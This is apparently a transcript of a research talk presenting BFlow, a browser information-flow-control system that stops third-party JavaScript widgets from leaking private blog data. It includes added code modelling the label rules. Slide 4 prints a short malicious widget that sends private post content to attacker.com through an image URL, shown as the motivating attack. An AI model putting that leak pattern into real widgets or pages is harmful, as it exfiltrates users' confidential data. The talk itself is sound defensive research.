
Privacy-Preserving Browser-Side Scripting With BFlow

Privacy-Preserving Browser-Side Scripting With BFlow. Alexander Yip, Neha Narula, Maxwell Krohn, Robert Morris, Massachusetts Institute of Technology. Web sites support 3rd party JavaScript extensions: Blogger.com supports "widgets" that read and modify blog posts.



Presentation Transcript


  1. Privacy-Preserving Browser-Side Scripting With BFlow
  Alexander Yip, Neha Narula, Maxwell Krohn, Robert Morris
  Massachusetts Institute of Technology

  2. Web Sites Support 3rd Party JavaScript Extensions
  • Blogger.com supports "widgets"
    • read and modify blog posts
  Example widgets shown: snippets of the last few blog posts; display the last few reader comments

  3. Confidential Blogs Are Vulnerable to 3rd Party JavaScript

  4. A 3rd Party JavaScript Leak Attack
  Widget has access to private blog content. Widget's JavaScript source code (the widget leaks private blog content to attacker.com):
      private_data = document.getElementById("posts");
      widget.innerHTML = private_data;
      widget.innerHTML += '<IMG SRC=http://attacker.com/' + private_data + '.gif>';
  Shows private blog content in widget's box.
  • Blogger.com wants to provide data to widgets
  • Browser security policy permits JS to send data freely
  • Wrote a malicious blogger.com widget in one hour
  Diagram: Alice's Browser (running Blogger JS + Attacker JS) sends an HTTP request "GET /sell_pet_food_online.gif HTTP/1.0" to the attacker.com Server

  5. Problem: Extensibility vs. Privacy (Choose one)
  • Either choose cool extensibility features
    • e.g. Blogger.com widgets
  • Or choose privacy and no 3rd party code
    • e.g. Gmail
  Figure: Gmail mockup with a message body shown as unreadable ciphertext, alongside two hypothetical extensions, Dan's Spell Checker ("Check Spelling!") and Joe's Encryption Widget ("Encrypt Mail" / "Decrypt Mail")

  6. Solution: BFlow
  • Eliminate the choice between features & privacy
  • Add information flow control (IFC)
    • To JavaScript in the browser
    • Track private data inside the browser and server
    • Prohibit communication that leaks private data

  7. Challenges
  • Fit JavaScript environment into an IFC model
    • Preserve JavaScript communication channels (send to top-level frame, send to sub-frame)
    • Mashups with private data (e.g. a private address sent to the Google Maps Server)
  • Easy to adopt
    • Minimize changes to JS that uses existing communication channels
    • Minimize changes required on the server
    • Easy for end-users to start using

  8. Contributions
  • An IFC model for the JS runtime environment
  • Easy to deploy and adopt implementation
    • Installs in browser with 2 clicks
    • Requires no changes to JavaScript interpreter
    • Only small changes to JavaScript communication API
  • A platform that supports real blogger.com widgets

  9. BFlow Overview
  • Blog Web Server (trusted protection zone) supplies some HTML/JS; a 3rd party supplies widget HTML/JS (untrusted protection zones)
  • Blog server "labels" private data with a "tag"
  • Browser Reference Monitor knows when a zone reads private data (zone label: "Saw Alice's private data")
  Diagram also shows the attacker.com Server as a possible destination

  10. BFlow Overview
  • Have not seen private data: can send requests to any server
  • Have seen private data: can only send requests to the data's server
  • Declassification: fetch map image from Google Maps, OK!
  • BFlow prevents the malicious widget from leaking private data
  Diagram: Browser Reference Monitor mediating requests to the Blog Web Server, attacker.com Server and Google Maps Server

  11. Design Outline
  • Tags and Labels
  • Protection Zones
  • Reference Monitor
  • Server

  12. Tags And Labels
  • A label is a set of tags
    • Describes what private data an object contains
    • Each zone, HTTP request, and response has a label
  • Each tag identifies a kind of private data
    • Alice's tag: blogger.com:alice
    • Bob's tag: blogger.com:bob
    • e.g. Alice's blog has label L={blogger.com:alice}

  13. Data Flow Rule
  • Data may flow only if L_data ⊆ L_receiver
  Diagram: JavaScript Data → Receiver?

  14. Protection Zones
  • A zone is a group of browser HTML <frames>
    • Regular JavaScript runs inside a frame inside a zone
    • All frames in a zone share the same label
  • Trusted zone
    • Top-level frame is in the site's trusted zone
    • Contains JavaScript written only by the site's developers
    • Need not abide by information flow restrictions
  • Untrusted zones
    • Contain 3rd party JavaScript
    • Must abide by information flow restrictions

  15. Example Zones & Labels
  • Trusted Zone (No Label)
  • Zone A L={}
  • Zone B L={blogger.com:alice}
  • Zone C L={}
  • Zone D L={blogger.com:alice}

  16. How Do Untrusted Zones Get Labels?
  • Trusted zone sets untrusted zone's label
  Diagram: Blog Web Server / Browser Reference Monitor; the untrusted zone's label goes from L={} to L={blogger.com:alice} after augment_label(blogger.com:alice)

  17. Works With Existing JS Channels
  • Channel 1: A frame can always send to its child frame
    • L_parent ⊆ L_child
  • Channel 2: A frame can always send to the top-level frame
    • To avoid leaking data, untrusted zones may contain only tags from the web site in the top-level frame
  Diagram (web page showing inherent JavaScript channels): Top-level Frame from X.com; Frame 1 L={X.com:A}, which may not add X.com:C to its label; Frame 2 L={X.com:A, X.com:B}; no sub-frame from X.com may add a tag from Y.com

  18. Why Zones Instead Of Frames?
  • Some JavaScript consists of multiple frames
    • e.g. Cbox chat widget: bottom frame writes messages to top frame
  • Group JavaScript into modules by label
    • All frames in the same zone can always communicate
    • Trusted JavaScript sets the label of a multi-frame widget only once
    • Existing multi-frame widgets need not coordinate label changes

  19. BFlow's JavaScript Model
  • All JavaScript will work if the IFC rules allow
    • AJAX, eval()
  • The IFC rule (L_data ⊆ L_receiver) affects
    • access to DOM variables & cookies
    • postMessage(), fragment-ID messages
    • HTTP requests and responses

  20. HTTP Request Rules
  • Trusted zone T
    • can send to any server (always)
    • can receive a response from any server (always)
  • Untrusted zone Z
    • can send to the server where secret data came from (always)
      • can receive the response (when L_response ⊆ L_Z)
    • can send to 3rd party server E (when L_Z = {}, or when the web site has a declassification exception for (server E, URL))
      • can receive the response (always)
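The label rules of slides 13, 16, 17 and 20 fit in a small reference-monitor model. The following is an added example written for this transcript, not BFlow's own extension code: labels are sets of tag strings, the zone names, server names, URLs and the declassification entry are constructed, and the scenario function replays the blog case from the slides so the decisions can be checked.

```javascript
// Added example, not BFlow's own code: a toy model of the label rules on
// slides 13, 16, 17 and 20. Labels are sets of tag strings ("site:name");
// zone names, server names and URLs below are constructed for illustration.

// Data flow rule helper: is every tag of label a also in label b?
function isSubset(a, b) {
  for (const tag of a) if (!b.has(tag)) return false;
  return true;
}

// The site a tag belongs to is the part before the colon.
function tagSite(tag) {
  return tag.split(':')[0];
}

class ReferenceMonitor {
  constructor(topLevelSite) {
    this.site = topLevelSite;      // site that owns the trusted top-level frame
    this.zones = new Map();        // zone name -> { trusted, label }
    this.declassify = new Set();   // "server|url" pairs the site allows despite a label
  }

  addZone(name, trusted = false) {
    this.zones.set(name, { trusted, label: new Set() });
  }

  // Slide 16: only the trusted zone may set an untrusted zone's label.
  // Slide 17: untrusted zones may contain only tags from the top-level site.
  augmentLabel(callerZone, targetZone, tag) {
    if (!this.zones.get(callerZone).trusted) return false;
    if (tagSite(tag) !== this.site) return false;
    this.zones.get(targetZone).label.add(tag);
    return true;
  }

  // Slide 13: data may flow between zones only if L_data ⊆ L_receiver.
  // The trusted zone is exempt from the restriction in either direction.
  canSend(fromZone, toZone) {
    const from = this.zones.get(fromZone);
    const to = this.zones.get(toZone);
    if (from.trusted || to.trusted) return true;
    return isSubset(from.label, to.label);
  }

  // Slide 20: an untrusted zone may always talk to the site its tags came
  // from; it may talk to a third party only while its label is empty or the
  // site has a declassification exception for that (server, URL).
  canRequest(zone, server, url) {
    const z = this.zones.get(zone);
    if (z.trusted || server === this.site) return true;
    if (z.label.size === 0) return true;
    return this.declassify.has(`${server}|${url}`);
  }

  // Slide 20: responses from the site are accepted only when L_response ⊆ L_Z;
  // third-party responses carry no site tags and are always accepted.
  canReceive(zone, server, responseLabel) {
    const z = this.zones.get(zone);
    if (z.trusted || server !== this.site) return true;
    return isSubset(responseLabel, z.label);
  }
}

// Replay the blog scenario from the slides and return the monitor's decisions.
function blogScenario() {
  const rm = new ReferenceMonitor('blogger.com');
  rm.addZone('top', true);                            // blogger.com's own JavaScript
  rm.addZone('widget');                               // untrusted 3rd-party widget
  rm.declassify.add('maps.google.com|/staticmap');    // constructed exception

  const beforeLabel = rm.canRequest('widget', 'attacker.com', '/x.gif');  // L={} so far
  rm.augmentLabel('top', 'widget', 'blogger.com:alice');                  // widget reads Alice's posts
  return {
    beforeLabel,                                                          // true
    foreignTagRejected: !rm.augmentLabel('top', 'widget', 'y.com:c'),     // true
    toAttacker: rm.canRequest('widget', 'attacker.com', '/x.gif'),        // false
    toBlogger: rm.canRequest('widget', 'blogger.com', '/save_post'),      // true
    toMapsDeclassified: rm.canRequest('widget', 'maps.google.com', '/staticmap'), // true
    aliceResponse: rm.canReceive('widget', 'blogger.com', new Set(['blogger.com:alice'])), // true
    bobResponse: rm.canReceive('widget', 'blogger.com', new Set(['blogger.com:bob'])),     // false
    widgetToTop: rm.canSend('widget', 'top'),                             // true
  };
}
```

The `canRequest` check is where the attack of slide 4 is stopped: once the widget's label contains a blogger.com tag, a request to any server other than blogger.com is refused unless the site itself listed that (server, URL) pair as a declassification exception.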

  21. The BFlow Server API
  • Propagate label from HTTP requests to responses
    • Read label contained in each request
    • Attach the label to any response that uses labeled data
  Diagram: Zone A (L={blogger.com:alice}) sends HTTP Request "POST save_post?content=sell_petfood_online" with Label L = {blogger.com:alice} to the Blog Web Server; the server later returns an HTTP Response with contents "sell_petfood_online" and Label L = {blogger.com:alice} to Zone B (L={blogger.com:alice})
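The server side of the model is the label propagation this slide describes. Below is an added example, not BFlow's server code: an in-memory post store in which each saved post keeps the label of the request that wrote it, and a read response carries the union of the labels of the posts it used. The "Label" header format, the request objects and the post contents are constructed for the example; the final function applies the slide 20 receive rule (L_response ⊆ L_Z) on the browser side.

```javascript
// Added example, not BFlow's own server code: a minimal model of the server
// API on slide 21. Each stored post keeps the label of the request that wrote
// it, and a response carries the union of the labels of the data it used.
// The header format and the request objects are constructed here.

const posts = new Map(); // post id -> { content, label: Set<string> }

// Parse a header like "L = {blogger.com:alice, blogger.com:bob}"; a missing
// header or empty braces mean the empty label.
function parseLabel(header) {
  const m = /\{([^}]*)\}/.exec(header || '');
  if (!m) return new Set();
  return new Set(m[1].split(',').map((s) => s.trim()).filter((s) => s.length > 0));
}

function formatLabel(label) {
  return `L = {${[...label].sort().join(', ')}}`;
}

// POST save_post?id=...&content=...: the stored data inherits the request's label.
function handleSave(req) {
  const label = parseLabel(req.headers.label);
  posts.set(req.query.id, { content: req.query.content, label });
  return { status: 200, headers: { label: formatLabel(label) }, body: 'saved' };
}

// GET read_posts?ids=a,b: the response label is the union of the labels of
// every post it includes, so labeled data never leaves the server unlabeled.
function handleRead(req) {
  const label = new Set();
  const contents = [];
  for (const id of req.query.ids.split(',')) {
    const post = posts.get(id);
    if (!post) continue;
    for (const tag of post.label) label.add(tag);
    contents.push(post.content);
  }
  return { status: 200, headers: { label: formatLabel(label) }, body: contents.join('\n') };
}

// Browser side (slide 20): a zone may receive the response only if L_response ⊆ L_zone.
function zoneMayReceive(zoneLabel, response) {
  for (const tag of parseLabel(response.headers.label)) {
    if (!zoneLabel.has(tag)) return false;
  }
  return true;
}

// Save one private and one public post, then read them back and apply the rule.
function demo() {
  posts.clear();
  handleSave({ query: { id: 'p1', content: 'sell_petfood_online' },
               headers: { label: 'L = {blogger.com:alice}' } });
  handleSave({ query: { id: 'p2', content: 'public announcement' },
               headers: { label: 'L = {}' } });
  const both = handleRead({ query: { ids: 'p1,p2' } });
  const publicOnly = handleRead({ query: { ids: 'p2' } });
  return {
    bothLabel: both.headers.label,                                            // "L = {blogger.com:alice}"
    publicLabel: publicOnly.headers.label,                                    // "L = {}"
    aliceZoneGetsBoth: zoneMayReceive(new Set(['blogger.com:alice']), both),  // true
    emptyZoneGetsBoth: zoneMayReceive(new Set(), both),                       // false
    emptyZoneGetsPublic: zoneMayReceive(new Set(), publicOnly),               // true
  };
}
```

The point a server implementer should take from this is that the label attached to a response is computed from the data actually used, not copied from the request: a zone with an empty label that asks for a mix of public and private posts gets a response it is not allowed to read, and the reference monitor in the browser, not the server, enforces that.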

  22. BFlow Implementation
  • No changes to JavaScript interpreter
  • JavaScript communication API changed slightly
  • Firefox extension: 1100 lines of code
  • Users can install with 2 clicks
  Diagram: Browser Reference Monitor

  23. Zone Isolation
  • Repurpose browser's same-origin policy (SOP)
    • Zones communicate via reference monitor
    • SOP is conservative: no DOM read/write across zones even if labels would allow
  Diagram: two zones with domain names Zone1.blogger and Zone2.blogger; no direct communication between them

  24. Applications
  • BF-Socialnet
    • Social network that supports 3rd party JS extensions
    • Protects private user data (see paper)
  • BFlogger
    • Blog mockup that supports blogger.com widgets
    • Ported 12 existing widgets to BFlogger

  25. BFlow Preserves Privacy
  • Wrote a malicious Blogger.com widget
    • Successfully leaks data from confidential blogs
  • Ported widget to BFlogger
    • BFlow prevents malicious widget from leaking data
  Diagram: attacker.com Server; no requests to attacker.com after reading private data

  26. BFlow Runs Existing JavaScript
  • Better privacy with little or no changes
  Note on the Chat widget: the change count is high because we made Chat store data on the BFlow server to protect chat data

  27. Existing Research
  • Can't grant read access without also leaking [MashupOS]
  • Requires rewriting JavaScript & manual jail config [Caja]
  • Don't support untrusted JavaScript [Swift, SIF]
  • User must make disclosure decisions [NoMoXSS]
  • Certificates [Java]

  28. Conclusion
  • 3rd party JavaScript can leak confidential user data
  • BFlow provides a new web security model
    • Tracks information flow between client & server
    • 3rd party JavaScript can safely compute and display
  • Enables new features in web sites
    • e.g. 3rd party Gmail extensions
  Questions
